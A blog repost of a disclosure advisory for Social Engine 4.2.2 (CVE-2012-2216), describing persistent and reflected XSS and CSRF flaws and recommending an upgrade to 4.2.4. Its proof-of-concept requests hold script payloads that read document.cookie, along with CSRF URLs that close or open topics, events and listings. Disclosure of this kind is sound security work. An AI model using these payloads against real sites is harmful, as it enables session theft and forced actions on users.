Regard Viscount , Now i Will Share Bugs
Social Engine 4.2.2 Multiples Vulnerabilities
Earlier versions are also possibly vulnerable.
INFORMATION
Product: Social Engine 4.2.2
Remote-Exploit: yes
Vendor-URL: http://www.socialengine.net/
Discovered by: Tiago Natel de Moura aka "i4k"
Discovered at: 10/04/2012
CVE Notified: 10/04/2012
CVE Number: CVE-2012-2216
OVERVIEW
Social Engine versions 4.2.2 is vulnerable to XSS and CSRF.
INTRODUCTION
SocialEngine is a PHP-based white-label social networking service
platform, that provides features similar to a social network on a user's
website. Main features include administration of small-to-mid scale
social networks, some customization abilities, unencrypted code,
multilingual capability, and modular plugin/widget compatibility. There
is a range of templates and add-ons available to extend the basic
features already included in the SocialEngine core.
VULNERABILITY DESCRIPTION
== Persistent XSS in music upload. ==
CWE-79: http://cwe.mitre.org/data/definitions/79.html
The software does not neutralize or incorrectly neutralizes
user-controllable input before it is placed in output that is
used as a web page that is served to other users.
Proof Of Concept:
POST http://localhost/index.php/music/create
POST data without form-data enctype:
title=<script>alert(document.cookie);</script>&description=teste
&search=1&auth_view=everyone&MAX_FILE_SIZE=8388608&filename=
&fancyuploadfileids=15
== Persistent XSS in creating events ==
POST
http://localhost/socialengine/socialengine422_trial/index.php/events/create
POST data without form-data enctype:
title=teste XSS 3&description=teste XSS 3&starttime[date]=4/9/2012&
starttime[hour]=1&starttime[minute]=0&starttime[ampm]=AM&endtime[date]=4/12/2012
&endtime[hour]=1&endtime[minute]=0&endtime[ampm]=AM&host=teste
&location=<script>alert(document.cookie);</script>&MAX_FILE_SIZE=8388608&
photo=&category_id=0&search=&search=1&approval=&auth_invite=&auth_invite=1&
auth_view=everyone&auth_comment=everyone&auth_photo=everyone&submit=
== Reflected XSS in search form of events area. ==
Direct javascript injected:
POST http://localhost/index.php/widget/index/content_id/644
format=html&subject=event_1&search=';alert(document.cookie);var a = '
Proof of Concept:
- - Go to URL: /index.php/event/$EVENT_ID
- - Click on the "Guests"
- - Click in "Search guests" form
- - Submit: ';alert(document.cookie); var a = '
You will see your PHPSESSID in the alert.
== Multiples CSRF vulnerabilities ==
CWE-352: http://cwe.mitre.org/data/definitions/352.html
The web application does not, or can not, sufficiently verify whether
a well-formed, valid, consistent request was intentionally provided by
the user who submitted the request.
A CSRF in the plugin "Forum" allows forcing the owner of the event to do
some
activities such as:
Close a topic:
GET /index.php/forums/topic/4/example-topic/close/close/1
Open a topic:
GET /index.php/forums/topic/4/example-topic/close/close/0
A CSRF in the plugin "Event" allows forcing the owner of the event to do
some
activities such as:
Close the event:
GET /index.php/events/topic/close/close/1/event_id/2/topic_id/2
Open the event:
GET /index.php/events/topic/close/close/0/event_id/2/topic_id/2
"Watch Topic":
GET /index.php/events/topic/watch/watch/1/event_id/2/topic_id/2
"Stop Watching Topic":
GET /index.php/events/topic/watch/watch/0/event_id/2/topic_id/2
A CSRF in the plugin "Classifieds" allows forcing the owner of the event
to do
some activities such as:
Open the classified listing:
GET /index.php/classifieds/close/1/closed/0
Close the classified listing:
GET /index.php/classifieds/close/1/closed/1
VERSIONS AFFECTED
Tested with version 4.2.2 but earlier versions are possibly vulnerable.
SOLUTION
Upgrade to Social Engine 4.2.4.
kalo dapat jangan lupa semangat ya salam kadal :)
regards Viscount
Socializer Widget By Blogger Yard
Related Posts:
Hacking
0 comments:
Post a Comment